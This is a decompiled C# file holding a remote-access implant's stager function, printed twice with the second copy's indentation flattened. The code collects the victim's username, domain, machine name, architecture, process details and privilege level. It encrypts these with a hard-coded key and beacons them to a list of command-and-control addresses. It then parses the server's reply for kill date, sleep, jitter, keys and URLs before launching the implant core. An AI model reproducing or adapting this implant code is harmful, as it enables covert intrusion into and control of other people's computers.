khr0x40sh/Primer.cs

## Primer.cs
// Program
// Token: 0x06000011 RID: 17 RVA: 0x000025C8 File Offset: 0x000007C8
private static void primer()
{
	if (DateTime.ParseExact("2025-01-01", "yyyy-MM-dd", CultureInfo.InvariantCulture) > DateTime.Now)
	{
		Program.dfs = 0;
		string text = "";
		try
		{
			text = WindowsIdentity.GetCurrent().Name;
		}
		catch
		{
			text = Environment.UserName;
		}
		if (Program.ihInteg())
		{
			text += "*";
		}
		string userDomainName = Environment.UserDomainName;
		string environmentVariable = Environment.GetEnvironmentVariable("COMPUTERNAME");
		string environmentVariable2 = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
		int id = Process.GetCurrentProcess().Id;
		string processName = Process.GetCurrentProcess().ProcessName;
		Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
		string text2 = null;
		string text3 = null;
		foreach (string text4 in Program.basearray)
		{
			string un = string.Format("{0};{1};{2};{3};{4};{5};1", new object[]
			{
				userDomainName,
				text,
				environmentVariable,
				environmentVariable2,
				id,
				processName
			});
			string key = "DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc=";
			text3 = text4;
			string address = text3 + "/Kettie/Emmie/Anni?Theda=Merrilee?c";
			try
			{
				string enc = Program.GetWebRequest(Program.Encryption(key, un, false, null)).DownloadString(address);
				text2 = Program.Decryption(key, enc);
				break;
			}
			catch (Exception ex)
			{
				Console.WriteLine(string.Format(" > Exception {0}", ex.Message));
			}
			Program.dfs++;
		}
		if (string.IsNullOrEmpty(text2))
		{
			throw new Exception();
		}
		Regex regex = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
		Match match = regex.Match(text2);
		string randomURI = match.Groups[1].ToString();
		regex = new Regex("URLS10484390243(.*)34209348401SLRU");
		match = regex.Match(text2);
		string stringURLS = match.Groups[1].ToString();
		regex = new Regex("KILLDATE1665(.*)5661ETADLLIK");
		match = regex.Match(text2);
		string killDate = match.Groups[1].ToString();
		regex = new Regex("SLEEP98001(.*)10089PEELS");
		match = regex.Match(text2);
		string sleep = match.Groups[1].ToString();
		regex = new Regex("JITTER2025(.*)5202RETTIJ");
		match = regex.Match(text2);
		string jitter = match.Groups[1].ToString();
		regex = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
		match = regex.Match(text2);
		string key2 = match.Groups[1].ToString();
		regex = new Regex("IMGS19459394(.*)49395491SGMI");
		match = regex.Match(text2);
		string stringIMGS = match.Groups[1].ToString();
		Program.ImplantCore(text3, randomURI, stringURLS, killDate, sleep, key2, stringIMGS, jitter);
	}
}
	// Program
	// Token: 0x06000011 RID: 17 RVA: 0x000025C8 File Offset: 0x000007C8
	private static void primer()
	{
	if (DateTime.ParseExact("2025-01-01", "yyyy-MM-dd", CultureInfo.InvariantCulture) > DateTime.Now)
	{
	Program.dfs = 0;
	string text = "";
	try
	{
	text = WindowsIdentity.GetCurrent().Name;
	}
	catch
	{
	text = Environment.UserName;
	}
	if (Program.ihInteg())
	{
	text += "*";
	}
	string userDomainName = Environment.UserDomainName;
	string environmentVariable = Environment.GetEnvironmentVariable("COMPUTERNAME");
	string environmentVariable2 = Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");
	int id = Process.GetCurrentProcess().Id;
	string processName = Process.GetCurrentProcess().ProcessName;
	Environment.CurrentDirectory = Environment.GetEnvironmentVariable("windir");
	string text2 = null;
	string text3 = null;
	foreach (string text4 in Program.basearray)
	{
	string un = string.Format("{0};{1};{2};{3};{4};{5};1", new object[]
	{
	userDomainName,
	text,
	environmentVariable,
	environmentVariable2,
	id,
	processName
	});
	string key = "DGCzi057IDmHvgTVE2gm60w8quqfpMD+o8qCBGpYItc=";
	text3 = text4;
	string address = text3 + "/Kettie/Emmie/Anni?Theda=Merrilee?c";
	try
	{
	string enc = Program.GetWebRequest(Program.Encryption(key, un, false, null)).DownloadString(address);
	text2 = Program.Decryption(key, enc);
	break;
	}
	catch (Exception ex)
	{
	Console.WriteLine(string.Format(" > Exception {0}", ex.Message));
	}
	Program.dfs++;
	}
	if (string.IsNullOrEmpty(text2))
	{
	throw new Exception();
	}
	Regex regex = new Regex("RANDOMURI19901(.*)10991IRUMODNAR");
	Match match = regex.Match(text2);
	string randomURI = match.Groups[1].ToString();
	regex = new Regex("URLS10484390243(.*)34209348401SLRU");
	match = regex.Match(text2);
	string stringURLS = match.Groups[1].ToString();
	regex = new Regex("KILLDATE1665(.*)5661ETADLLIK");
	match = regex.Match(text2);
	string killDate = match.Groups[1].ToString();
	regex = new Regex("SLEEP98001(.*)10089PEELS");
	match = regex.Match(text2);
	string sleep = match.Groups[1].ToString();
	regex = new Regex("JITTER2025(.*)5202RETTIJ");
	match = regex.Match(text2);
	string jitter = match.Groups[1].ToString();
	regex = new Regex("NEWKEY8839394(.*)4939388YEKWEN");
	match = regex.Match(text2);
	string key2 = match.Groups[1].ToString();
	regex = new Regex("IMGS19459394(.*)49395491SGMI");
	match = regex.Match(text2);
	string stringIMGS = match.Groups[1].ToString();
	Program.ImplantCore(text3, randomURI, stringURLS, killDate, sleep, key2, stringIMGS, jitter);
	}
	}